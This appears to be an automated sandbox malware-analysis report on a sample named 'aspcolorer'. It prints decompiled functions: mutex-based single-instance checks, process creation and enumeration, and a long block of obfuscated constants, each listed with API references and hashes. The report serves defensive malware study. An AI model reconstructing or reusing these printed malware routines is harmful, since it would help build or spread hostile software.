			E02D611CD(void* __edi) {
				void* __esi;
				void* _t7;
				void* _t14;
				void* _t17;
				void* _t19;
				void* _t21;

				_t17 = __edi;
				GetModuleFileNameW(??, ??, ??);
				_push(_t21 - 0x18);
				_push(0x80);
				_t7 = L02D62020(_t19); // executed
				if(_t7 != 0) {
					WaitForSingleObject(_t19, 0xffffffff);
					CloseHandle( *(_t21 - 0x18));
					CloseHandle( *(_t21 - 0x14));
				}
				CloseHandle(_t19);
				CloseHandle(_t14);
				return _t17;
			}

0x02d611cd
0x02d611cd
0x02d611d6
0x02d611d7
0x02d611e2
0x02d611ec
0x02d611f1
0x02d611fa
0x02d61203
0x02d61203
0x02d6120a
0x02d61211
0x02d6121f

APIs

GetModuleFileNameW.KERNEL32 ref: 02D611CD
WaitForSingleObject.KERNEL32(?,000000FF), ref: 02D611F1
CloseHandle.KERNEL32(?,?,000000FF), ref: 02D611FA
CloseHandle.KERNEL32(?,?,000000FF), ref: 02D61203
CloseHandle.KERNEL32(?,?,000000FF), ref: 02D6120A
CloseHandle.KERNEL32(?,?,?,000000FF), ref: 02D61211

Memory Dump Source

Source File: 00000005.00000002.668324043.0000000002D61000.00000020.00000001.sdmp, Offset: 02D60000, based on PE: true

Associated: 00000005.00000002.668317677.0000000002D60000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.668336748.0000000002D71000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.668346733.0000000002D72000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d60000_aspcolorer.jbxd

Yara matches

Similarity

API ID: CloseHandle$FileModuleNameObjectSingleWait
String ID:
API String ID: 2436384749-0
Opcode ID: 7423811e3f8f6be2c9e5cf1b3711397e6ea70fc09251ddf3d4039d03d5feb2cb
Instruction ID: 9c1625f5ca2bb1abc4a682db32c6ad2735b81e73d88ff3fef881a3189425632f
Opcode Fuzzy Hash: 7423811e3f8f6be2c9e5cf1b3711397e6ea70fc09251ddf3d4039d03d5feb2cb
Instruction Fuzzy Hash: 3AE06C36980015ABCB025B60EE0E9AD773DEF05713F000652F605D03D0FB354D29CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02D62031, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E02D62031(WCHAR* __esi) {
				int _t11;
				void* _t17;
				void* _t21;

				E02D617E0(_t17);
				 *(_t21 - 0x58) = 0x44;
				_t11 = CreateProcessW(__esi, 0, 0, 0, 0,  *(_t21 + 8), 0, 0, _t21 - 0x58, _t21 - 0x10); // executed
				if(_t11 == 0) {
					goto 0x2d80675;
					asm("int3");
					return _t11;
				} else {
					if( *((intOrPtr*)(_t21 + 0xc)) == 0) {
						CloseHandle( *(_t21 - 0x10));
						CloseHandle( *(_t21 - 0xc));
						return 1;
					} else {
						asm("movdqu xmm0, [ebp-0x10]");
						asm("movdqu [eax], xmm0");
						return 1;
					}
				}
			}

0x02d62031
0x02d62039
0x02d62055
0x02d6205d
0x02d62095
0x02d6209a
0x02d6209b
0x02d6205f
0x02d62064
0x02d6207c
0x02d62085
0x02d62094
0x02d62066
0x02d62066
0x02d6206b
0x02d62078
0x02d62078
0x02d62064

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,00000000,00000044,?), ref: 02D62055
CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,00000000,00000000,00000044,?), ref: 02D6207C
CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,00000000,00000000,00000044,?), ref: 02D62085

Strings

D, xrefs: 02D62039

Memory Dump Source

Source File: 00000005.00000002.668324043.0000000002D61000.00000020.00000001.sdmp, Offset: 02D60000, based on PE: true

Associated: 00000005.00000002.668317677.0000000002D60000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.668336748.0000000002D71000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.668346733.0000000002D72000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d60000_aspcolorer.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateProcess
String ID: D
API String ID: 2922976086-2746444292
Opcode ID: f6b69f63056c451d357586bb0f2c5cafa0ee04ad43713d40953ca2aa240851da
Instruction ID: 17ae568daf2838045ad6d0d9a42c26dab8c009a0e9022ddf767a52e176271b33
Opcode Fuzzy Hash: f6b69f63056c451d357586bb0f2c5cafa0ee04ad43713d40953ca2aa240851da
Instruction Fuzzy Hash: D9F09071A80248BBEB224F94DC0ABFD7B79FB04701F104652FE08A93C0EBB69954C794

Uniqueness

Uniqueness Score: -1.00%

Function 02D6103C, Relevance: 6.0, APIs: 4, Instructions: 46
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 32%

			E02D6103C(void* __esi, void* __eflags) {
				void* _t29;
				void* _t35;
				void* _t37;
				void* _t46;
				long _t51;
				void* _t61;
				void* _t62;
				int _t73;
				void* _t75;
				void* _t76;
				void* _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t84;
				void* _t86;

				_t75 = __esi;
				 *(_t82 - 4) = 0;
				 *((intOrPtr*)(_t82 - 8)) = GetCurrentProcessId();
				_t73 = 0; // executed
				L02D61C00(E02D61000, _t82 - 4); // executed
				_t4 = _t73 + 0x14; // 0x14
				_t72 = _t4;
				_t76 = L02D61D10(0x2d72000, _t4, 0, _t75);
				 *0x2d75070(_t82 - 0x118, 0x40, _t76,  *(_t82 - 4), 0x64da9f26);
				_t86 = _t84 + 0x14;
				_t66 = _t76;
				L02D61DB0(_t76);
				_t29 = CreateMutexW(0, 1, _t82 - 0x118); // executed
				_t61 = _t29;
				if(_t61 == 0) {
					L6:
					goto 0x2d80045;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("invalid");
					_t77 = L02D61D10(_t66, _t72, _t73, _t76);
					 *0x2d75070(_t82 - 0x118, 0x40, _t77,  *((intOrPtr*)(_t82 - 8)));
					_t67 = _t77;
					L02D61DB0(_t77);
					_t35 = CreateMutexW(0, 1, _t82 - 0x118); // executed
					_t62 = _t35;
					if(_t62 != 0) {
						goto 0x2d80062;
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("invalid");
						_t37 = L02D61D10(_t67, _t72, _t73, _t77);
						 *0x2d75070(_t82 - 0x98, 0x40, _t37,  *((intOrPtr*)(_t82 - 8)));
						L02D61DB0(_t37);
						_t80 = CreateEventW(0, 1, 0, _t82 - 0x98);
						if(_t80 != 0) {
							goto 0x2d8007f;
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							GetModuleFileNameW();
							_push(_t82 - 0x18);
							_push(0x80);
							_t46 = L02D62020(_t80); // executed
							if(_t46 != 0) {
								WaitForSingleObject(_t80, 0xffffffff);
								CloseHandle( *(_t82 - 0x18));
								CloseHandle( *(_t82 - 0x14));
							}
							CloseHandle(_t80);
						}
						CloseHandle(_t62);
					}
				} else {
					_t51 = GetLastError();
					if(_t51 == 0xb7) {
						_t72 = _t51 + 0x1d;
						_t81 = L02D61D10(0x2d72020, _t51 + 0x1d, 0, _t76);
						 *0x2d75070(_t82 - 0x98, 0x40, _t81,  *(_t82 - 4));
						_t86 = _t86 + 0x14;
						_t66 = _t81;
						L02D61DB0(_t81);
						_t76 = CreateEventW(0, 1, 0, _t82 - 0x98);
						if(_t76 != 0) {
							SetEvent(_t76);
							CloseHandle(_t76);
							_t73 = 1;
						}
					}
					CloseHandle(_t61);
					if(_t73 == 0) {
						goto L6;
					}
				}
				return _t73;
			}

0x02d6103c
0x02d6103c
0x02d6104c
0x02d61054
0x02d61056
0x02d61060
0x02d61060
0x02d61070
0x02d6107f
0x02d61085
0x02d61088
0x02d6108a
0x02d61099
0x02d6109f
0x02d610a3
0x02d6111f
0x02d6111f
0x02d61124
0x02d61125
0x02d61126
0x02d61127
0x02d61128
0x02d61129
0x02d6112a
0x02d6112b
0x02d6112c
0x02d61136
0x02d61145
0x02d6114e
0x02d61150
0x02d61160
0x02d61166
0x02d6116a
0x02d61170
0x02d61175
0x02d61176
0x02d61177
0x02d61178
0x02d61179
0x02d6117a
0x02d6117b
0x02d6117c
0x02d6117d
0x02d6117f
0x02d61196
0x02d611a1
0x02d611b9
0x02d611bd
0x02d611bf
0x02d611c4
0x02d611c5
0x02d611c6
0x02d611c7
0x02d611c8
0x02d611c9
0x02d611ca
0x02d611cb
0x02d611cc
0x02d611cd
0x02d611d6
0x02d611d7
0x02d611e2
0x02d611ec
0x02d611f1
0x02d611fa
0x02d61203
0x02d61203
0x02d6120a
0x02d6120a
0x02d61211
0x02d61211
0x02d610a5
0x02d610a5
0x02d610b0
0x02d610b7
0x02d610c7
0x02d610d6
0x02d610dc
0x02d610df
0x02d610e1
0x02d610f7
0x02d610fb
0x02d610fe
0x02d61105
0x02d6110b
0x02d6110b
0x02d610fb
0x02d61111
0x02d61119
0x00000000
0x00000000
0x02d61119
0x02d6121f

APIs

GetCurrentProcessId.KERNEL32 ref: 02D61043
CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 02D61099
GetLastError.KERNEL32 ref: 02D610A5
CloseHandle.KERNEL32(00000000), ref: 02D61111

Memory Dump Source

Source File: 00000005.00000002.668324043.0000000002D61000.00000020.00000001.sdmp, Offset: 02D60000, based on PE: true

Associated: 00000005.00000002.668317677.0000000002D60000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.668336748.0000000002D71000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.668346733.0000000002D72000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d60000_aspcolorer.jbxd

Yara matches

Similarity

API ID: CloseCreateCurrentErrorHandleLastMutexProcess
String ID:
API String ID: 4019642867-0
Opcode ID: c81b5fcfcaf1fc8fd16764851ef39ea46531cbd9e509d08a283b6c1a29a8e042
Instruction ID: c541cd0df0d3832f6490b24bbe1c774fa34bc3fae41a68cae7cf03176ef24078
Opcode Fuzzy Hash: c81b5fcfcaf1fc8fd16764851ef39ea46531cbd9e509d08a283b6c1a29a8e042
Instruction Fuzzy Hash: D901F771A4010597DB21AB90E94E7FD777AEB84342F1009A5E60DD2340EF39CE18CEA2

Uniqueness

Uniqueness Score: -1.00%

Function 02D4228E, Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 14
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcmpW.KERNELBASE ref: 02D422BB

Strings

ov8oTdn, xrefs: 02D422A9
_E9e3X1YKeRS, xrefs: 02D422A2

Memory Dump Source

Source File: 00000005.00000002.668305085.0000000002D40000.00000040.00000001.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.668312256.0000000002D46000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d40000_aspcolorer.jbxd

Similarity

API ID: lstrcmp
String ID: _E9e3X1YKeRS$ov8oTdn
API String ID: 1534048567-2173848329
Opcode ID: 84a994b8165c0d1182a3cf3a9ef52ef188633d60daf74016109b1d789d582fcd
Instruction ID: 9339063e75957b467d7ea2b41795828bfa10e477c9a107521228d77c3e1184eb
Opcode Fuzzy Hash: 84a994b8165c0d1182a3cf3a9ef52ef188633d60daf74016109b1d789d582fcd
Instruction Fuzzy Hash: F7E017B8E102008BCB04EF38DE492197BF0BB1A204F2085E9D845AB350DE30AD99CF92

Uniqueness

Uniqueness Score: -1.00%

Function 02D61C27, Relevance: 3.0, APIs: 2, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Process32FirstW.KERNEL32 ref: 02D61C33
FindCloseChangeNotification.KERNELBASE ref: 02D61C71

Memory Dump Source

Source File: 00000005.00000002.668324043.0000000002D61000.00000020.00000001.sdmp, Offset: 02D60000, based on PE: true

Associated: 00000005.00000002.668317677.0000000002D60000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.668336748.0000000002D71000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.668346733.0000000002D72000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d60000_aspcolorer.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindFirstNotificationProcess32
String ID:
API String ID: 2932581522-0
Opcode ID: 7ec0a390c981418e3e97674a9c906aa3dc38a0eefaf288fbf15ad06da5453d86
Instruction ID: 59a9f798b14d688dbbfee95f4b5fd8adcf4e269a5bed783b70192c971bb7cc12
Opcode Fuzzy Hash: 7ec0a390c981418e3e97674a9c906aa3dc38a0eefaf288fbf15ad06da5453d86
Instruction Fuzzy Hash: 61C01260482110AAE2022A61A80C66E7A7DEB06602B014581E40290340DB388E19CAAA

Uniqueness

Uniqueness Score: -1.00%

Function 02D61C58, Relevance: 3.0, APIs: 2, Instructions: 7
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Process32NextW.KERNEL32 ref: 02D61C58
FindCloseChangeNotification.KERNELBASE ref: 02D61C71

Memory Dump Source

Source File: 00000005.00000002.668324043.0000000002D61000.00000020.00000001.sdmp, Offset: 02D60000, based on PE: true

Associated: 00000005.00000002.668317677.0000000002D60000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.668336748.0000000002D71000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.668346733.0000000002D72000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d60000_aspcolorer.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNextNotificationProcess32
String ID:
API String ID: 2947032094-0
Opcode ID: b2ce341bb8a84d469d0313396963352ef5dd776a9b880d6c425de1c33fd5cf6a
Instruction ID: 5eeae95422e99e09b5be79d638cdba021d92f3eb304d9925366bcce3962816d5
Opcode Fuzzy Hash: b2ce341bb8a84d469d0313396963352ef5dd776a9b880d6c425de1c33fd5cf6a
Instruction Fuzzy Hash: 4CB01230588000D7520A2A31A50C13D3BBDFF039473020A86E043C0340FB38CE2CD67B

Uniqueness

Uniqueness Score: -1.00%

Function 02D6112C, Relevance: 1.5, APIs: 1, Instructions: 29
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 02D61160

Memory Dump Source

Source File: 00000005.00000002.668324043.0000000002D61000.00000020.00000001.sdmp, Offset: 02D60000, based on PE: true

Associated: 00000005.00000002.668317677.0000000002D60000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.668336748.0000000002D71000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.668346733.0000000002D72000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d60000_aspcolorer.jbxd

Yara matches

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 47d26229db4fbfe201444f8301ffc734ee7574a1af03443bbf2c46ea9d6fd049
Instruction ID: 0981a4daa7633ea8b906818f7d3ac3a903125e246cc6d1c89074eb0cbc87a9c7
Opcode Fuzzy Hash: 47d26229db4fbfe201444f8301ffc734ee7574a1af03443bbf2c46ea9d6fd049
Instruction Fuzzy Hash: 04E02276B4010857EB20A6A8EC8ABED7369EB44351F0000B1EB0DD2340EE62CD288FE1

Uniqueness

Uniqueness Score: -1.00%

Function 02D6F290, Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			_entry_() {
				void* _t3;
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t8;

				L02D6D430();
				L02D6E1D0(); // executed
				_t3 = L02D61030(); // executed
				_t11 = _t3;
				if(_t3 != 0) {
					L02D6D020(_t5, _t6, _t7, _t8, _t11);
				}
				ExitProcess(0);
			}

0x02d6f296
0x02d6f29b
0x02d6f2a0
0x02d6f2a5
0x02d6f2a7
0x02d6f2a9
0x02d6f2a9
0x02d6f2b0

APIs

ExitProcess.KERNEL32 ref: 02D6F2B0

Memory Dump Source

Source File: 00000005.00000002.668324043.0000000002D61000.00000020.00000001.sdmp, Offset: 02D60000, based on PE: true

Associated: 00000005.00000002.668317677.0000000002D60000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.668336748.0000000002D71000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.668346733.0000000002D72000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d60000_aspcolorer.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 486253fc53f3d8397fa54149581cdb20e955d1b826584c4442fbdadc25ae4d8d
Instruction ID: 8ea19c34725a04112c793c65801c7c7cadd2ea8632170aab3776a97aa9af35c0
Opcode Fuzzy Hash: 486253fc53f3d8397fa54149581cdb20e955d1b826584c4442fbdadc25ae4d8d
Instruction Fuzzy Hash: D3C01221669A4413922833BA2C0E729321BCB01251F2002208960903C0FE10AC0088BB

Uniqueness

Uniqueness Score: -1.00%

Function 02D61C45, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE ref: 02D61C71

Memory Dump Source

Source File: 00000005.00000002.668324043.0000000002D61000.00000020.00000001.sdmp, Offset: 02D60000, based on PE: true

Associated: 00000005.00000002.668317677.0000000002D60000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.668336748.0000000002D71000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.668346733.0000000002D72000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d60000_aspcolorer.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 3b19c1f1a2a5bd6382cf64013ca3e8a7d9ceb4acb001861924ddc89b46bb45d0
Instruction ID: 3c061f423032abf055e94a177d0c15fb89ce411bd0b06764d99ba769a70e070b
Opcode Fuzzy Hash: 3b19c1f1a2a5bd6382cf64013ca3e8a7d9ceb4acb001861924ddc89b46bb45d0
Instruction Fuzzy Hash: FBB01210048502D311112120590C03E65BE69034863034A93D087C4344DB14CE3CD27B

Uniqueness

Uniqueness Score: -1.00%

Function 02D61C10, Relevance: 1.5, APIs: 1, Instructions: 8
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 02D61C14

Memory Dump Source

Source File: 00000005.00000002.668324043.0000000002D61000.00000020.00000001.sdmp, Offset: 02D60000, based on PE: true

Associated: 00000005.00000002.668317677.0000000002D60000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.668336748.0000000002D71000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.668346733.0000000002D72000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d60000_aspcolorer.jbxd

Yara matches

Similarity

API ID: CreateSnapshotToolhelp32
String ID:
API String ID: 3332741929-0
Opcode ID: 71a8aba178523ae4af8e2a3ae359fb8528ed4f0f2541329e8566ab2f8e90fdc1
Instruction ID: b72a6109f91eb99367cebf2cbcc4229a2a77f58d70c8785c303f2c618f06f359
Opcode Fuzzy Hash: 71a8aba178523ae4af8e2a3ae359fb8528ed4f0f2541329e8566ab2f8e90fdc1
Instruction Fuzzy Hash: 92B09272984620878328353C644C06CA1A1465A23A31B0B628EBA933E0A664CC1AD441

Uniqueness

Uniqueness Score: -1.00%

Function 02D61C6A, Relevance: 1.5, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE ref: 02D61C71

Memory Dump Source

Source File: 00000005.00000002.668324043.0000000002D61000.00000020.00000001.sdmp, Offset: 02D60000, based on PE: true

Associated: 00000005.00000002.668317677.0000000002D60000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.668336748.0000000002D71000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.668346733.0000000002D72000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d60000_aspcolorer.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 2570ca893c950e3b2dbf0e98e652ba63abe97216076a6805f98e5352c668d3cb
Instruction ID: 8d19f0f6d7c92763cfe14f3b9eb0c24b44327b48cb21f5876dc232524e3b368a
Opcode Fuzzy Hash: 2570ca893c950e3b2dbf0e98e652ba63abe97216076a6805f98e5352c668d3cb
Instruction Fuzzy Hash: A8B0122004050393111132601A0823D16BD4D028463020490D143D0300E714CD28C17A

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02D6814A, Relevance: 40.7, APIs: 1, Strings: 22, Instructions: 464
libraryCOMMON

Download Yara Rule

C-Code - Quality: 99%

			E02D6814A(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t448;
				void* _t458;

				_t448 = __ebx;
				 *((intOrPtr*)(_t458 - 0x6e8)) = 0x93d3353a;
				 *((intOrPtr*)(_t458 - 0x6e4)) = 0x4605c826;
				 *((intOrPtr*)(_t458 - 0x6e0)) = 0xc6958939;
				 *((intOrPtr*)(_t458 - 0x6dc)) = 0x5dab499d;
				 *((intOrPtr*)(_t458 - 0x6d8)) = 0x1f7e8fb9;
				 *((intOrPtr*)(_t458 - 0x6d4)) = 0xb995c187;
				 *((intOrPtr*)(_t458 - 0x6d0)) = 0xcdd546ff;
				 *((intOrPtr*)(_t458 - 0x6cc)) = 0x37094802;
				 *((intOrPtr*)(_t458 - 0x6c8)) = 0x8cdc2e4e;
				 *((intOrPtr*)(_t458 - 0x6c4)) = 0xb320bfb1;
				 *((intOrPtr*)(_t458 - 0x6c0)) = 0xcb1e7a8c;
				 *((intOrPtr*)(_t458 - 0x6bc)) = 0xe57104cd;
				 *((intOrPtr*)(_t458 - 0x6b8)) = 0xc2acaa27;
				 *((intOrPtr*)(_t458 - 0x6b4)) = 0xfffc7ea3;
				 *((intOrPtr*)(_t458 - 0x6b0)) = 0x12a7a295;
				 *((intOrPtr*)(_t458 - 0x6ac)) = 0x68e5d236;
				 *((intOrPtr*)(_t458 - 0x6a8)) = 0x11b4886f;
				 *((intOrPtr*)(_t458 - 0x6a4)) = 0xbfceef8b;
				 *((intOrPtr*)(_t458 - 0x6a0)) = 0x5c189831;
				 *((intOrPtr*)(_t458 - 0x69c)) = 0x7dd922bc;
				 *((intOrPtr*)(_t458 - 0x698)) = 0x69467954;
				 *((intOrPtr*)(_t458 - 0x694)) = 0x7a42d677;
				 *((intOrPtr*)(_t458 - 0x690)) = 0xa9b05d05;
				 *((intOrPtr*)(_t458 - 0x68c)) = 0x2e47771d;
				 *((intOrPtr*)(_t458 - 0x688)) = 0xf9d08660;
				 *((intOrPtr*)(_t458 - 0x684)) = 0xac9f16f9;
				 *((intOrPtr*)(_t458 - 0x680)) = 0xf9ff3cde;
				 *((intOrPtr*)(_t458 - 0x67c)) = 0xb042b119;
				 *((intOrPtr*)(_t458 - 0x678)) = 0xf29da24a;
				 *((intOrPtr*)(_t458 - 0x674)) = 0x8188d25d;
				 *((intOrPtr*)(_t458 - 0x670)) = 0xd3ff17b;
				 *((intOrPtr*)(_t458 - 0x66c)) = 0x3ee260bb;
				 *((intOrPtr*)(_t458 - 0x668)) = 0xea9b113f;
				 *((intOrPtr*)(_t458 - 0x664)) = 0xa69ba4c8;
				 *((intOrPtr*)(_t458 - 0x660)) = 0xcfa9a480;
				 *((intOrPtr*)(_t458 - 0x65c)) = 0x52f53b2;
				 *((intOrPtr*)(_t458 - 0x658)) = 0x3ad8d9c2;
				 *((intOrPtr*)(_t458 - 0x654)) = 0x558a60e2;
				 *((intOrPtr*)(_t458 - 0x650)) = 0x378d8bfd;
				 *((intOrPtr*)(_t458 - 0x64c)) = 0xb18c5bb6;
				 *((intOrPtr*)(_t458 - 0x648)) = 0xe3ead4c5;
				 *((intOrPtr*)(_t458 - 0x644)) = 0xcc66d316;
				 *((intOrPtr*)(_t458 - 0x640)) = 0x6cd91144;
				 *((intOrPtr*)(_t458 - 0x63c)) = 0xb3b9e0c4;
				 *((intOrPtr*)(_t458 - 0x638)) = 0x6f5bc14b;
				 *((intOrPtr*)(_t458 - 0x634)) = 0x917aba4d;
				 *((intOrPtr*)(_t458 - 0x630)) = 0x8c6a56e7;
				 *((intOrPtr*)(_t458 - 0x62c)) = 0x52431b0a;
				 *((intOrPtr*)(_t458 - 0x628)) = 0x9ad32afb;
				 *((intOrPtr*)(_t458 - 0x624)) = 0xcfb02ab7;
				 *((intOrPtr*)(_t458 - 0x620)) = 0xe30927ea;
				 *((intOrPtr*)(_t458 - 0x61c)) = 0xdea47ec0;
				 *((intOrPtr*)(_t458 - 0x618)) = 0x3d024311;
				 *((intOrPtr*)(_t458 - 0x614)) = 0x60be170e;
				 *((intOrPtr*)(_t458 - 0x610)) = 0xcaf73f3b;
				 *((intOrPtr*)(_t458 - 0x60c)) = 0x22c4eb47;
				 *((intOrPtr*)(_t458 - 0x608)) = 0xc459bbe2;
				 *((intOrPtr*)(_t458 - 0x604)) = 0xcaea007f;
				 *((intOrPtr*)(_t458 - 0x600)) = 0xcfd92684;
				 *((intOrPtr*)(_t458 - 0x5fc)) = 0x4b4e9076;
				 *((intOrPtr*)(_t458 - 0x5f8)) = 0x42ebe20;
				 *((intOrPtr*)(_t458 - 0x5f4)) = 0x5078dd2d;
				 *((intOrPtr*)(_t458 - 0x5f0)) = 0xda2de6b;
				 *((intOrPtr*)(_t458 - 0x5ec)) = 0xc5a3da79;
				 *((intOrPtr*)(_t458 - 0x5e8)) = 0xf0236b52;
				 *((intOrPtr*)(_t458 - 0x5e4)) = 0xa1142609;
				 *((intOrPtr*)(_t458 - 0x5e0)) = 0x64ca20fc;
				 *((intOrPtr*)(_t458 - 0x5dc)) = 0x519b188f;
				 *((intOrPtr*)(_t458 - 0x5d8)) = 0xe73aa59f;
				 *((intOrPtr*)(_t458 - 0x5d4)) = 0x5946dd5a;
				 *((intOrPtr*)(_t458 - 0x5d0)) = 0xa600ca7c;
				 *((intOrPtr*)(_t458 - 0x5cc)) = 0xb9066eda;
				 *((intOrPtr*)(_t458 - 0x5c8)) = 0x9f617e3a;
				 *((intOrPtr*)(_t458 - 0x5c4)) = 0x7e87a24d;
				 *((intOrPtr*)(_t458 - 0x5c0)) = 0x3fd259ea;
				 *((intOrPtr*)(_t458 - 0x5bc)) = 0x145456ef;
				 *((intOrPtr*)(_t458 - 0x5b8)) = 0xa963e5e2;
				 *((intOrPtr*)(_t458 - 0x5b4)) = 0xc52f05eb;
				 *((intOrPtr*)(_t458 - 0x5b0)) = 0x164156b2;
				 *((intOrPtr*)(_t458 - 0x5ac)) = 0x3a510a47;
				 *((intOrPtr*)(_t458 - 0x5a8)) = 0xe3c9968b;
				 *((intOrPtr*)(_t458 - 0x5a4)) = 0x9c8cc5c;
				 *((intOrPtr*)(_t458 - 0x5a0)) = 0xd2e2368f;
				 *((intOrPtr*)(_t458 - 0x59c)) = 0xa637d7f9;
				 *((intOrPtr*)(_t458 - 0x598)) = 0x779a00f1;
				 *((intOrPtr*)(_t458 - 0x594)) = 0xe5ba1aff;
				 *((intOrPtr*)(_t458 - 0x590)) = 0xde30a087;
				 *((intOrPtr*)(_t458 - 0x58c)) = 0xd7b46516;
				 *((intOrPtr*)(_t458 - 0x588)) = 0x5738762d;
				 *((intOrPtr*)(_t458 - 0x584)) = 0xbb19243e;
				 *((intOrPtr*)(_t458 - 0x580)) = 0x363e0993;
				 *((intOrPtr*)(_t458 - 0x57c)) = 0x36980fe4;
				 *((intOrPtr*)(_t458 - 0x578)) = 0x55d743a6;
				 *((intOrPtr*)(_t458 - 0x574)) = 0x68affd74;
				 *((intOrPtr*)(_t458 - 0x570)) = 0x3c792d4;
				 *((intOrPtr*)(_t458 - 0x56c)) = 0x2d4c203d;
				 *((intOrPtr*)(_t458 - 0x568)) = 0x6d5f18a;
				 *((intOrPtr*)(_t458 - 0x564)) = 0xb9628181;
				 *((intOrPtr*)(_t458 - 0x560)) = 0xda670d38;
				 *((intOrPtr*)(_t458 - 0x55c)) = 0xc8a43992;
				 *((intOrPtr*)(_t458 - 0x558)) = 0x5c0f7588;
				 *((intOrPtr*)(_t458 - 0x554)) = 0x2c25a171;
				 *((intOrPtr*)(_t458 - 0x550)) = 0x211f522;
				 *((intOrPtr*)(_t458 - 0x54c)) = 0xe76860ea;
				 *((intOrPtr*)(_t458 - 0x548)) = 0xd665a1e9;
				 *((intOrPtr*)(_t458 - 0x544)) = 0xd6ec39a3;
				 *((intOrPtr*)(_t458 - 0x540)) = 0xf6a2a8e0;
				 *((intOrPtr*)(_t458 - 0x53c)) = 0xb6f2f712;
				 *((intOrPtr*)(_t458 - 0x538)) = 0xca3453dc;
				 *((intOrPtr*)(_t458 - 0x534)) = 0xb977fc83;
				 *((intOrPtr*)(_t458 - 0x530)) = 0x5d7f07a8;
				 *((intOrPtr*)(_t458 - 0x52c)) = 0x7e1dc698;
				 *((intOrPtr*)(_t458 - 0x528)) = 0xcb981af7;
				 *((intOrPtr*)(_t458 - 0x524)) = 0x68e3c94;
				 *((intOrPtr*)(_t458 - 0x520)) = 0x5c60ae92;
